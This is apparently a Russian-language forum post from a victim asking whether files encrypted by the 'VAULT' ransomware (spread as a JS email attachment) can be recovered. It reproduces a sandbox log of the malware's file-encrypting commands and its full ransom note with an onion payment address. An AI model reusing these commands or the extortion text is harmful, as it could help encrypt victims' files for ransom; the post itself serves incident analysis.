Добрый день! В одну фирмочку пришло письмо, в аттаче был js, его, по классике жанра, запустили. Тот и закриптовал все файлы от Офиса, до которых дотянулся. Моих скудных познаний хватает на то, чтобы понять, как оно примерно работает - но вот понять, можно-ли это вообще восстановить, не могу. Сайт злоумышленников лежит, понять, сколько они хотят за разблокировку, не могу.
Всё, что нарыл по зловреду (js+то, что он скачал для работы+логи работы) - в zip по ссылке.
******
ОК, как мне его выложить, чтобы могли помочь? Удалил с шары.
Запустил js в песочнице - тот отработал очень бысто, закрыл много файлов за довольно небольшое время. Вот кусок лога его работы:
"%temp%\svchost.exe" -r Cellar --trust-model always --yes -z 3 -q --homedir "%temp%" -o "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_Germany.svg.jpg.vault" -e "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_Germany.svg.jpg" && move /y "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_Germany.svg.jpg.vault" "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_Germany.svg.jpg" & rename "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_Germany.svg.jpg" "150px-Flag_of_Germany.svg.jpg.vault"
"%temp%\svchost.exe" -r Cellar --trust-model always --yes -z 3 -q --homedir "%temp%" -o "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_the_United_States.svg.jpg.vault" -e "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_the_United_States.svg.jpg" && move /y "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_the_United_States.svg.jpg.vault" "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_the_United_States.svg.jpg" & rename "E:\xampp-win32-1.8.1-VC9\xampp\src\xampp-control-panel\gfx\150px-Flag_of_the_United_States.svg.jpg" "150px-Flag_of_the_United_States.svg.jpg.vault"
"%temp%\svchost.exe" -r Cellar --trust-model always --yes -z 3 -q --homedir "%temp%" -o "E:\xampp-win32-1.8.1-VC9\xampp\tomcat\webapps\examples\jsp\jsp2\jspx\textRotate.jpg.vault" -e "E:\xampp-win32-1.8.1-VC9\xampp\tomcat\webapps\examples\jsp\jsp2\jspx\textRotate.jpg" && move /y "E:\xampp-win32-1.8.1-VC9\xampp\tomcat\webapps\examples\jsp\jsp2\jspx\textRotate.jpg.vault" "E:\xampp-win32-1.8.1-VC9\xampp\tomcat\webapps\examples\jsp\jsp2\jspx\textRotate.jpg" & rename "E:\xampp-win32-1.8.1-VC9\xampp\tomcat\webapps\examples\jsp\jsp2\jspx\textRotate.jpg" "textRotate.jpg.vault"
"%temp%\tick.exe" -s"05FNSH-!hash5!" -r"05FNSH-OK" -o "%temp%\VAULT.KEY"
"%temp%\tick.exe" -s"05FNSH-!hash5!" -r"05FNSH-OK" -o "%appdata%\VAULT.KEY"
"%temp%\tick.exe" -s"05FNSH-!hash5!" -r"05FNSH-OK" -o "%userprofile%\Desktop\VAULT.KEY"
Портит файлы: doc, xml, jpg, docx. Другие пока не проверял.
Вот что лежит на поражённом компе:
All your important data have been encrypted into LOCAL DIGITAL VAULT
You need to get your UNIQUE KEY to restore files with extension .vault
THE PROCEDURE FOR OBTAINING YOUR PERSONAL KEY:
BRIEFLY
1. Access our secure website
2. Get your personal key
3. Unlock files
DETAILED
STEP 1:
Download Tor browser from official site: https://www.torproject.org
Instructions for launching Tor browser: https://www.torproject.org/projects/torbrowser.html.en#windows
STEP 2:
Visit our web resource using Tor browser: http://restoredz4xpmuqr.onion
If you CAN NOT access this website, read this: http://pastebin.com/raw.php?i=rs7jZ0TW
STEP 3:
Find your personal VAULT.KEY on computer, it's your key for accessing Client Panel
Log into your personal fully automated Client Panel via VAULT.KEY
Read FAQ carefully in the relevant section.
STEP 4:
After receiving key, you can decode your files using our open source software.
ADDITIONAL
a) You can't restore encrypted files without your personal key (which is securely stored on our server)
b) Do not forget about TIME. Usually it plays against you.
ENCRYPT TIME: 12.02.2015 (17:40)
Сложный
Простой
Простой
Простой
